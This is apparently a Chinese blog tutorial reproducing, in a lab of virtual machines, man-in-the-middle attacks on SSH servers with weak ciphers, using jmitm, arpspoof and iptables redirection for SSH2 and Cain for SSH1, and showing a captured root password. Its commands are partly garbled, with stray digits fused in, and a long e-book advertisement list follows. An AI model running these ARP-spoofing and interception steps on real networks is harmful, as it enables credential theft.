SSH协议弱加密算法漏洞的利用及复现（中间人攻击）

SSH协议弱加密算法漏洞的利用及复现（中间人攻击）

很多服务器或者交换机是存在SSH协议弱加密算法漏洞的，但是该漏洞如何利用呢？最近研究了下此漏洞的相关利用方法，对其整个攻击过程进行了复现。哈哈，本文具体操作步骤适合小白操作，也欢迎大神指正，希望大神对于此漏洞利用提出一些想法或者更好，更便捷的方法，促进交流哈！???

本文主要从SSH1.0和SSH2.0两个版本进行攻击复现，具体操作如下：

一、SSH2.0版本

1.准备环境

Linux虚拟机3台：

192.168.136.139：作为SSH服务端192.168.136.143：作为SSH客户端192.168.136.142：作为中间人攻击端

2.详细步骤

首先验证SSH服务端和客户端使用的协议及版本，可用如下命令查看：

nc -VV 192.168.136.139 221

nc -VV 192.168.136.143 221

我们再使用Nmap探测SSH客户端使用的加密算法：

nmap --script ssh2-enum-algos -sV -p 192.168.136.1431

可以发现使用算法中包含arcfour, arcfour128, arcfour256等弱加密算法。

在中间人机器（192.168.136.142）上下载jmitm软件并解压：

wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz #下载tar xf jmitm2-0.1.0.tar.gz #解压12

对该工具进行配置，编辑jmitm软件中的server.xml（/jmitm2-0.1.0/conf/server.xml）配置文件：

运行/jmitm2-0.1.0/bin目录下的runm.sh程序，开始监听连接：

./runm.sh1

依次运行以下命令：

echo 1 > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECTiptables -A FORWARD -j ACCEPTarpspoof -i eth0 –t 192.168.136.143（客户端IP） 192.168.136.139（服务端IP）1234

在ssh客户端机器上登录ssh服务端，命令如下：

ssh root@192.168.136.139 -p 22 -21

并输入密码toor进行登录。

查看运行的程序runm.sh所输出的内容中，发现成功捕获到用户名（root）/密码（toor）：

至此SSHV2.0版本中间人攻击成功。

二、SSH1.0版本

1.准备环境

两台装有SSH-1.5-OpenSSH_3.8.1p1的Windows虚拟机（169.254.238.43、169.254.227.194）

装有Cain软件的本地物理机作为中间人机器（169.254.141.172）

2.复现步骤

使用软件Cain。

（1）选择虚拟机使用的网卡，如图

（2）选择start sniff，进行嗅探，点击Hosts按钮，扫描出局域网中存活主机。

（3）点击下方“ARP”按钮，添加需要嗅探的两个目标主机IP地址，如图

（4）点击工具栏上“ARP”按钮，开始中间人攻击。

（5）在Windows虚拟机（169.254.238.43）中进行ssh连接，并输入相关用户名密码

ssh 用户名@169.254.227.194 -p 22 -11

查看Cain软件，发现arp到用户名和密码，如图：

最后还可以查看ssh连接时所执行过的命令。

备注：

可能会出现SSH密钥不对的情况，这是因为目标已经被链接过的原因，重启机器即可。

这里SSH1.0版本不包含1.9版本，1.9版本的攻击方法是降级攻击，先通过脚本对其进行降级，再进行arp，这里以后有时间再试试? 之前试过几次，没试出来，使用的ettercap嗅探时会报错！???

《算法导论 第三版英文版》_高清中文版

《深度学习入门：基于Python的理论与实现》_高清中文版

《深入浅出数据分析》_高清中文版

《Python编程：从入门到实践》_高清中文版

《Python科学计算》_高清中文版

《深度学习入门：基于Python的理论与实现》_高清中文版

《深入浅出数据分析》_高清中文版

《Python编程：从入门到实践》_高清中文版

我的第一本算法书石田保辉 & 宫崎修一限时 ¥17.5 ¥34.99深度学习入门：基于 Python 的理论与实现[日] 斋藤康毅限时 ¥14.99 ¥29.99算法图解：像小说一样有趣的算法入门书Aditya Bhargava限时 ¥12.5 ¥24.99Redis 开发与运维付磊 & 张益军限时 ¥15 ¥30算法之美布莱恩 · 克里斯汀 等限时 ¥9.99 ¥35.4Python 编程：从入门到实践Eric Matthes限时 ¥21.99 ¥44.5百面机器学习：算法工程师带你去面试诸葛越，葫芦娃限时 ¥26.99 ¥53.99SQL 进阶教程MICK限时 ¥19.99 ¥39.99TensorFlow 学习指南：深度学习系统构建详解Tom Hope 等限时 ¥15 ¥30Elasticsearch 搜索引擎开发实战罗刚 & 张子宪 限时 ¥15 ¥30Python 深度学习François Chollet限时 ¥29.99 ¥59.99Java 并发编程的艺术方腾飞、魏鹏 等限时 ¥12.5 ¥25深度学习：智能时代的核心驱动力量特伦斯·谢诺夫斯基限时 ¥29.99 ¥52.8scikit-learn 机器学习：常用算法原理及编程实战黄永昌限时 ¥12.5 ¥25Java 高并发编程详解：多线程与架构设计汪文君限时 ¥22.5 ¥45Linux 内核分析及应用陈科限时 ¥20 ¥40Spring Cloud 微服务架构开发实战董超 & 胡炽维限时 ¥20 ¥40Python 基础教程（第3版）Magnus Lie Hetland限时 ¥24.99 ¥49.99深度学习：卷积神经网络从入门到精通李玉鑑限时 ¥20 ¥40Python 神经网络编程塔里克 · 拉希德限时 ¥24.99 ¥49.99跟老男孩学 Linux 运维：Web 集群实战老男孩限时 ¥24.5 ¥49Python 高性能编程Micha Gorelick 等限时 ¥25.5 ¥50.99趣学算法陈小玉限时 ¥29.99 ¥59.99Java 9 模块化开发：核心原则与实践Sander Mak 等限时 ¥15 ¥30增长黑客：如何低成本实现爆发式增长Sean Ellis · 增长黑客之父限时 ¥14.99 ¥35.99钱：7步创造终身收入托尼 · 罗宾斯限时 ¥19.99 ¥35.4Go 语言实战李兆海 · Go 语言早期使用者和推广者限时 ¥19.99 ¥39.99代码之外的功夫：程序员精进之路Gregory T. Brown限时 ¥12.5 ¥24.99今日简史：人类命运大议题尤瓦尔 · 赫拉利限时 ¥19.99 ¥40.8RocketMQ 实战与原理解析杨开元限时 ¥12.5 ¥25重新理解创业：一个创业者的途中思考周航限时 ¥12.99 ¥34.8Linux 就该这么学刘遄限时 ¥27.99 ¥55.99Python 高级编程（第2版）Michał Jaworski & Tarek Ziadé限时 ¥29.99 ¥59.99Web 全栈工程师的自我修养余果 · 腾讯高级 UI 工程师，前端开发组负责人限时 ¥14.99 ¥29.99未来世界的幸存者阮一峰限时 ¥9.99 ¥19.99Spring 微服务实战John Carnell限时 ¥27.99 ¥55.99精通 Python 网络爬虫：核心技术、框架与项目实战韦玮限时 ¥12.5 ¥25微服务设计Sam Newman · ThoughtWorks 技术专家限时 ¥14.99 ¥29.99精通 Python 爬虫框架 ScrapyDimitrios Kouzis-Loukas限时 ¥19.99 ¥39.99刷新：重新发现商业与未来[美] 萨提亚 · 纳德拉限时 ¥12.99 ¥34.8原 则瑞 · 达利欧（Ray Dalio）限时 ¥36.99 ¥58.8基因传[美] 悉达多 · 穆克吉限时 ¥19.99 ¥52.8混乱：如何成为失控时代的掌控者蒂姆 · 哈福德限时 ¥16.99 ¥33.6深入浅出 React 和 Redux程墨限时 ¥12.5 ¥25